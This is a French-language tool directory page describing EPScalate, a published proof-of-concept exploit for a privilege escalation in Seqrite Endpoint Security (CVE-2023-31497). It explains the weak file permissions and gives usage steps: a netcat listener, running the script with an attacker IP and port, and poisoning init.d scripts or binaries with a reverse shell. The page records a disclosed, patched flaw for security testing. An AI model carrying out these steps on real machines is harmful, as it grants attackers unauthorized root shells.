Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/0xinfection/epscalate
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationPost-ExploitationTests d'Intrusion
GitHub0xinfection/epscalate

EPScalate

Exploit pour une vulnérabilité d'élévation de privilèges dans QuickHeal Seqrite EPS (CVE-2023-31497).

Voir le dépôt
192il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

EPScalate

Une vulnérabilité d'élévation de privilèges dans la solution de sécurité Seqrite Enterprise Endpoint Security (EPS) de QuickHeal. Cette vulnérabilité s'est vu attribuer l'ID CVE CVE-2023-31497.

https://user-images.githubusercontent.com/39941993/230790056-87157751-b96c-49a6-81df-bf3126acfbd6.mp4

Détails du vendeur et du produit

  • Vendeur : Quick Heal Technologies Limited
  • Produit : Seqrite Endpoint Security (EPS)
  • Page d'accueil du produit : https://www.seqrite.com/endpoint-security/seqrite-endpoint-security
  • Versions affectées : Toutes les versions antérieures à v8.0.

Détails de la vulnérabilité

Seqrite endpoint security, lors de son installation par défaut, s'installe dans /usr/lib/Seqrite/ avec des permissions de répertoire et de fichier très faibles, accordant à un utilisateur local un accès complet en lecture/écriture au contenu du répertoire. De plus, la procédure d'installation place ses scripts de démarrage dans /etc/init.d/, lesquels sont modifiables par tout le monde. Cela permet à tout utilisateur à faible privilège sur le système d'élever ses privilèges à root.

L'exploit exploite 2 vulnérabilités différentes introduites par le logiciel pour élever les privilèges sur le système. Premièrement, le fait que l'application utilise des scripts dans /etc/init.d/ pour lancer ses processus d'analyse, scripts qui peuvent être écrits par n'importe quel utilisateur. Deuxièmement, l'application utilise des objets partagés pour charger dynamiquement du code indépendant de la position (PIC) lors de l'exécution. En fait, tous les fichiers objets partagés exécutables sont modifiables par tout le monde. Enfin, les binaires de l'application utilisés pour le processus démon sont modifiables par tout le monde, ce qui signifie essentiellement que tout utilisateur non privilégié peut écraser les binaires de l'analyseur avec un binaire de reverse shell pour exécuter du code arbitraire en tant que root.

Utilisation de l'exploit

L'exploit est un simple fichier Python qui facilite l'exploitation de la vulnérabilité.

Étapes :

  1. Sur la machine de l'attaquant, démarrez un écouteur en utilisant netcat (nc -lvp <port>) ou metasploit (multi/handler).
  2. Copiez/téléchargez les fichiers epscalate.py et shellcode.c sur le système cible.
  3. Exécutez le fichier Python avec les arguments appropriés (python3 epscalate.py -H 192.168.0.103:9999 -I).
  4. Attendez que l'AV se recharge / que le système redémarre.
  5. La connexion inverse vers votre écouteur peut confirmer l'exécution de code en tant que root.

Aide de l'exploit :

root@kitploit:~
$ python epscalate.py -h

    EPSCALATE - PoC pour l'escalade de privilèges dans Seqrite EPS
                ~ 0xInfection

usage: epscalate.py -H <host>:<port> <technique_flag>

options:
  -h, --help            affiche ce message d'aide et quitte
  -H HOSTPORT, --hostport HOSTPORT
                        L'IP et le port de la machine d'écoute de l'attaquant au format <ip>:<port>
  -B, --daemon-binaries
                        Écraser les binaires principaux du démon pour élever les privilèges.
  -I, --initd-scripts   Empoisonner les scripts de démarrage bash /etc/init.d/ avec un reverse shell pour élever les privilèges.

Support

L'exploit a été testé sur toutes les variantes de systèmes d'exploitation basées sur Debian et Ubuntu.

Licence et crédits

Le code de l'exploit a été publié sous la licence Apache 2.0. La vulnérabilité a été divulguée au vendeur et a été corrigée au moment de la publication de la vulnérabilité.

Crédits de la vulnérabilité et de l'exploit : Pinaki Mondal (0xInfection).

Télécharger l’outil